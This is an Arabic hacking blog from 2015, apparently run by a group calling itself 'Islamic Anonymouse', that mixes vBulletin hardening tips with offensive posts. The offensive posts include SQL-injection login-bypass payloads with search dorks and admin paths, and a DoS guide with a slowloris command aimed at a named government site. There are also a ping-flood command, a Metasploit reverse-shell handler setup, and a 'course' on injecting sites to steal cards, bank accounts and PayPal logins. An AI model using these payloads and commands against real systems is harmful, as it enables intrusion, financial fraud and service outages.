اعلان (728 x‏ 90)

21‏/5‏/2015

تاخير في النشر او عدم النشر

السلام عليكم ورحمة الله وبركاته

اسفين علي قله المنشورات 

وذالك بسبب مشكلة في النت 

و الروتر فيه مشاكل 

في يوم 25 هنرجعلكم تاني 

و يارب مش نفقد اي زوار لينا

شارك الموضوع

18‏/5‏/2015

[ترقيع] لثغرة الـ Spacer_open

السلام عليكم ورحمة الله وبركاته

كثير منا يشاهد منتديات يتم اختراقها عن طريق ال spacer_open

وهذا حل مبدئي لتفادي الاختراق بواسطة هذا القالب

فكرة الترقيع : تغيير اسم قالب spacer_open الى اسم مايعرفه احد الا انت وبذلك عندما يضرب المخترق قالب ال spacer_open لن يجدى ذلك نفعا لانه لن يكون له اي وجود


شرح الترقيع :

افتح ملف global.php

ثم ابحث عن
كود:
eval('$spacer_open = "' . fetch_template('spacer_open') . '";');
معنى الكود انه المتغير $spacer_open يقوم بإستدعاء القالب spacer_open

سوف نقوم بتغيير اسم القالب الى اي اسم نريده وليكن مثلا rawabetvb

اي اننا سوف نستبدل الكود العلوي بهذا الكود

كود:
eval('$spacer_open = "' . fetch_template('rawabetvb') . '";');
بذلك اصبح المتغير $spacer_open يقوم بإستدعاء القالب rawabetvb والقالب spacer_open ليس له اي فائدة ,,,

لم يبقى الى شئ بسيط

من لوحة التحكم >

الاستايلات والقوالب >

التحكم في الاستيلات ثم نقوم بإضافة قالب جديد باسم rawabetvb (طبعا يجب ان يكون اسم القالب متوافق مع الاسم اللى وضعته في ملف global.php )


ثم تقوم بوضع التالي في هذا القالب

<!-- open content container --> <if condition="$show['old_explorer']"> <table cellpadding="0" cellspacing="0" border="0" width="$stylevar[outertablewidth]" align="center"><tr><td class="page" style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px"> <else /> <div align="center"> <div class="page" style="width:$stylevar[outerdivwidth]; text-align:$stylevar[left]"> <div style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px"> </if>
ثم حفظ .

شارك الموضوع

حل تغرث ملف faq.php للنسخة 3.8.6


السلام عليكم

حل تغرث ملف faq.php للنسخة 3.8.6


طريقة حل الثغرة

الان بالشركة تم تعديل الملفات



Security Patch Release 3.8.6 PL1


الشرح التراقيع الثغرات


الطريقة قم برفع الملفات


install/vbulletin-language.xml

من خلال تنزيلك من خلال الرابط
http://members.vbulletin.com/patches.php

ومن بعد رفع الملفات
توجه الي
لوحة التحكم
اللغات
رفع وتنزيل اللغة
واعمل استيراد للغة من ملف الانستول
لا تقم بوضع اي مسار فقط اعمل استيراد وانتهي

includes/version_vbulletin.php
Latest Stable Version: 3.8.6 Patch Level 1

شارك الموضوع

شرح اخفاء اصدار المنتدي للحمايه من الهكر


هذي طريقة سهلة جدا لـ كيفية إخفاء إصدار المنتدى ..

لـ تصعب على الهكرز إختراق المنتدى ..

إفـتـح قـالب footer

إبحث عن

$vbphrase[powered_by_vbulletin]

وإستبدله بـ

Powered by vBulletin Copyright ©2000 - 2009, Jelsoft Enterprises Ltd


بالتوفيق للجميع
 
 
 
 

شارك الموضوع

ترقيع ثغرة الـ forumhome


ترقيع ثغرة الـ forumhome



اذهب الى الـ F T P ومن ثم افتح ملف المنتدى الرئيسي وافتح ملف newthread.php
الموجود داخل مجلد المنتدى

وأبحث عن

رمز PHP:
$newpost['title'] =& $vbulletin->GPC['subject'];


استبدلها بـ

رمز PHP:
$newpost['title'] =htmlspecialchars_uni(& $vbulletin->GPC['subject']);
// $newpost['title'] =& $vbulletin->GPC['subject'];



وبكده تم ترقيع ثغرة

forumhome





شارك الموضوع

شرح طريقة حماية المنتدى بنسبة 97% ( وسد معظم الثغرات )


بسم لله الرحمن الرحيم ،،


طريقة حماية منتداك وسد معظم ثغراته
1- يجب وضع حماية على المجلدات التالية :.
admincp
includes
modcp
install
archive
2- تغيير اسم مجلد admincp الى اي اسم اخر .
3- عدم مراسلة الاعضاء من لوحة التحكم عبر البريد الاكتروني .
4- إيقاف خاصية مراسلة الاعضاء فيما بينهم (او بعضهم البعض) عبر البريد الإلكتروني
الطريقة كـ الاتي:.
لوحة تحكم المنتدى > خيارات المنتدى > خيارات البريد > السماح للمستخدمين بالمراسلة البريدية للأعضاء الآخرين . خليها لا
5- تغيير محتوى الملفات . showgroups.php و memberlist.php و online.php و calendar.php بـ محتوى index.php
والطريقة كـ الاتي :.
الدخول عبر برنامج FTP . ثم الذهاب الى مجلد المنتدى vb ثم تنزيل ملف index.php . ثم فتحة عبر برنامج المفكرة ، ونسخ محتواه كاملاً ، ثم تنزيل الملفات
showgroups.php و memberlist.php و online.php و calendar.php ثم فتح الملفات المذكورة ملف ملف واستبدال محتواها بمحتوى index.php
ثم إعادة رفع الملفات المذكورة showgroups.php و memberlist.php و online.php و calendar.php .
6- إيقاف خاصية الارشيف من لوحة تحكم المنتدى .
الطريقة كـ الاتي:.
من لوحة تحكم المنتدى ومن خيارات المنتدى ومن خيارات ارشيف محركات البحث ستجد اول خيار تمكين أرشيف المنتدى اجعلها ( لا ) .


7- تعديل تمبليت SHOWTHREAD في جميع الاستايلات ، وذالك ((((بـ حذف)))) الكود المرفق(مهم جداً) .



8- تغيير تصريح مجلد includes الى 751 ، وايضا ً إعطاء جميع ما يحتوية نفس التصريح .

------------------------------------------
وهكذا تم حماية منتداك97% وسد جميع ثغراته ^_^
وكذا انت سويت الا عليك وانت الباقي على ربكـ ,,
ولاتنسى اختيار الاستضافه القويه والمحميه فهي تشكل دور كبير في الحمايه

شارك الموضوع

حماية المنتدي من ثغره التسجيل باسم الادمن 3.7 ,VB 3.8

السلام عليكم ,

بخصوص الثغرة او الخطأ يمكن المخترق بتسجيل عضوية جديد تحميل نفس اسم الادمن الحالي وتمكنه من الاطلاع على الرسائل الخاصة للادمن و خداع الاعضاء .

ترقيع الثغرة الدخول الى لوحة التحكم ثم خيارات لوحة التحكم ثم خيارات الرقابة ثم نضع الكود التالي في الكلمات الممنوعة


 &#00                                                                    

                 بالتوفيق للجميع                                                            

شارك الموضوع

تنصيب DDoS-Deflate على السيرفر للحماية من هجمات الدوس


السلام عليكم ورحمة الله وبركاته

سكريبت DDoS-Deflate هو سكريبت مجاني ومفتوحة المصدر ويمكننا اعتباره من أفضل الأدوات الخاصة بصد هجمات حجب الخدمة على مستوى البرامج.

طريقة العمل :
1-افتح برنامج putty لاصحاب السرفرات فقط واتصل بالسرفر .
2-لما اتطلعلك الشاشة السوداء لكتابة الاوامر اكتب التالي :

لتنصيب السكربت:
الامر :
 
wget http://www.inetbase.com/scripts/ddos/install.sh
لاعطاء التصريح :
 
الامر : 
 
chmod 0700 install.sh
  امر التشغيل:
 الامر :
./install.sh
 
بالتوفيق للجميع 

شارك الموضوع

حماية المواقع من الحقن sql injection و تغير اللينك من php الي html

السلام عليكم اخواني في الانونيموس الاسلامي


اليوم بإذن الله سنتعرّف قليلا على أحد إمكانات ملفّات htaccess التي نجدها في ملفات المواقع و لا نعطيها أهمّية و لها إمكانات كبيرة جدا
ماهي ملفات htaccess ؟
هي ملفّات تعطي أوامر للــ apache و هو برنامج على السيرفر يهتم بالروابط و التوجيه و ربط الدومينات بالإيبي و غيرها (( باختصار )) و بإمكانكم البحث أكثر عن الأباتش فما كتبته مجرد مثال
طيّب إخواني نفرض أن لدي سكربت فيه صفحات كل صفحة أكتبها رابطها مثلا

www.site.com/millenium.php?id=56
ممكن أفتح قوس هنا إخواني لو تسمحو و هي معلومة أذكّركم بها
millenim.php
هو الملف للصفحات و الذي يحوي أكود تلك الصحفة
****
?id
نقطة الإستفهام هي علامة إستعلام للمتصفّح أي كأن المتصفّح يسأل السيرفر ((' أي صفحة أظهر للمستخدم '))

=56

السرفر يعطيه الصفحة رقم 56 في الخانة رقم 56


طيّب إخواني لكي نتجنّب الحقن سأجعل الصفحة تظهر
www.site.com/mill-56.html
و هنا قمت بشيئين
أخفيت إسم الملف الحقيقي لكي لا يستطيع الهكر حقن الملف لأنه لا يعرف إسمه
غيرت الإمتداد إلى html حتى لا يستطيع الحقن

كيف أقوم بذلك
اذهب إلى مجلد الإسكربت أو ملفات الموقع ( بمدير المفات في السيبنل ) لأن برامج الأف تي بي لا تظهر ملفات htaccess
افتح ملف .htacceess
اكتب

RewriteEngine on
و تعني تشغيل ملف إتش تي أكسس
RewriteEngine on

هذا الكود يقوم بتشغيل الخاصيه في موقعك
لعد ذلك نقوم بتعريف السيرفر ما هو الاسلوب الذي يتعامل به مع الملفات عن طريق وضع الاتي

RewriteRule ^New Url$ old Url

أولاً نضع الاتي

RewriteRule

و هذا الكود يدل علي بدأ تبديل الرابط الاول
و يتكون هذا السطر من ^ و هذه العلامه تعني بداية الرابط الاول المراد تغيره
و بعد ذلك نضع الرابط الاول الجديد المراد التغيير إليه و بعد ذلك أضفنا
$ و هي تعني إنتهاء الجزء الخاص بالملف المراد التغيير إليه
و بعد ذلك قمنا بوضع اسم الملف القديم

RewriteEngine on
RewriteRule ^index.htm$ index.php


بالنسبة لمثالنا الأول تصبح هكذا



RewriteEngine on

RewriteRule mill-(.*)\.html$ millenium.php?id=$1

شارك الموضوع

4 - فحص الايميلات paypal - دورة حقن sql injection

بسم الله الرحمن الرحيم الدورة هتتركز علي 

1 - فحص المواقع
2 - سحب الفيزات و اهم الجداول
3 - استخراج الحسابات و اهم الجداول
4 - فحص حسابات البيبال
___________________________________
تحميل البرامج المستخدمه :
دي لسته هدية للتطبيق الدوره عليها للعلم انها كلها die 
list email
 ______________________________________________________
بالتوفيق للجميع

شارك الموضوع

3 - حقن المواقع و اخراج الايميلات - دوره حقن sql injection

بسم الله الرحمن الرحيم الدورة هتتركز علي 



1 - فحص المواقع
2 - سحب الفيزات و اهم الجداول
3 - استخراج الحسابات و اهم الجداول
4 - فحص حسابات البيبال
___________________________________
تحميل البرامج المستخدمه :
دي لسته هدية للتطبيق الدوره عليها للعلم انها كلها die 
list email
 ______________________________________________________
بالتوفيق للجميع

شارك الموضوع

2 - حقن المواقع و اخراج الفيزا - دوره حقن sql injection

بسم الله الرحمن الرحيم الدورة هتتركز علي 



1 - فحص المواقع
2 - سحب الفيزات و اهم الجداول
3 - استخراج الحسابات و اهم الجداول
4 - فحص حسابات البيبال
___________________________________
تحميل البرامج المستخدمه :
دي لسته هدية للتطبيق الدوره عليها للعلم انها كلها die 
list email
 ______________________________________________________
بالتوفيق للجميع

شارك الموضوع

1- فحص موقع المصابه : دورة حقن sql injection


بسم الله الرحمن الرحيم الدورة هتتركز علي 




1 - فحص المواقع
2 - سحب الفيزات و اهم الجداول
3 - استخراج الحسابات و اهم الجداول
4 - فحص حسابات البيبال
___________________________________
تحميل البرامج المستخدمه :
دي لسته هدية للتطبيق الدوره عليها للعلم انها كلها die 
list email
 ______________________________________________________
بالتوفيق للجميع

شارك الموضوع

ثغره bypass اخري لاختراق المواقع

السلام عليكم ورحمة الله وبركاته 

اقدم لكم ثغره bypass اخري من اكتشاف GhostxHack

الدورك : Powered By DATA nGEN TECH (M) Sdn Bhd

مسار الادمن : /admin_login.php

الاستغلال:
 ' or'1=1

 

Tito, V!ru$s , Mr.TNT , Anonymouse , Ahmed Bel

 

شارك الموضوع

ثغره bypass جديده من اكتشاف V!ru$s

السلام عليكم ورحمة الله وبركاته

شرح اليوم ثغره Bypass الخطيره

اولا الدورك :inurl:vn/admin/login.php

ثانيا الاستغلال:

 '=' 'or'  

ثالثا الفيديو

 

شارك الموضوع

اقوي تجميعة من برامج Doss Attack


التجميعة مقدمة من : V!ru$s
هذه اقوي تجميعه من برامج الدوس اتاك فتاكه

تقوم بزيادة الضغط علي الموقع بشكل كبير و requestat كثيره


شارك الموضوع

مقدمة : دورة Sql injection و سحب الحسابات البنكية


مقدمة دورة الحقن و سحب الحسابات البنكية


بسم الله الرحمن الرحيم الدورة هتتركز علي 

1 - فحص المواقع
2 - سحب الفيزات و اهم الجداول
3 - استخراج الحسابات و اهم الجداول
4 - فحص حسابات البيبال
___________________________________
تحميل البرامج المستخدمه :
دي لسته هدية للتطبيق الدوره عليها للعلم انها كلها die 
list email
 ______________________________________________________
بالتوفيق للجميع

شارك الموضوع

تحميل Kali-Linux اخر اصدار 32xbit , 64xbit

السلام عليكم احب اطرح اليكم اليوم 
تحميل ال kali lunix باخر اصدارته

لا احب اطول عليكو 

اتفضلو التحميل





شارك الموضوع

طريقة الهجوم علي المواقع و اسقاطها بسهولة علي Kali-Lunix

السلام عليكم ورحمة الله وبركاته

موضوعنا ظاهر من عنوانه

__________________________

امر الاستهداف:ping ip site -t -l 65500
البرنامج لتشغيل الاداة
رابط البرنامج:
http://www.activestate.com/activeperl...
رابط كود slowloris
http://ha.ckers.org/slowloris/slowlor...
 امر الاستهداف : 
start C:\slowloris.pl -dns www.gov.il -port 80

_________________________________


الشرح مقدم من : Tito

شارك الموضوع

فتح بورت في الارميتاج بدون مشاكل Kali-Lunix





السلام عليكم ورحمة الله وبركاته

************************

انهارده معانا شرح طريقة فتح بورت في الارميتاج بدون مشاكل
علي توزيعة الكالي ليونكس بالفيديو

 ***********************
الشرح مقدم من : Tito

**********************************

الاوامر المستخدمة:
لفتح بورت 4444 في ميتاسلويب رغماً عن شركة الاتصال
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
[set lhost [your ip
[set lport [the port
                            


شارك الموضوع

فريق العمل


 ___________________________________
V!ru$s
Mr.TNT
Tito Prince
Ahmed Bel

  

شارك الموضوع

اضافة مقال بالمدونة

السلام عليكم ورحمة الله وبركاته



_______________________________________
يمكنك اضافة مقال في المدونة 

عن طريق كتابه المقال 

و ارساله الي :
 Lovegame158@gmail.com
و يشمل الاتي

1 - عنوان التدوينة
2 - قسم التدوينة
3 - نص التدوينة 
[اختياري] صوره او بدون
______________________________________ 
اضافة الثغرات

يمكنك كتابه ثغره و نشرها باسمك وحقوقك علي مدونتنا

و ارسالها الي : 
  LoveGame158@gmail.com

و يجب ان يكون بالطريقة الاتي و يحتوي علي المعلومات الاتية :

[+]      عنوان الثغره      
[+]             الدورك      
[+]       اصدار الاسكربت
[+] رابط مطور الاسكربت
[اختاري] [+]   طريقة ترقيع الثغره              

ممنوع منع باتا وضع روابط لمواقع اخري او اشهار لعدم تجاهل الثغره
_____________________________________________________________


تحياتي : فريق Islamic Anonymouse
______________________________________________________________
 


شارك الموضوع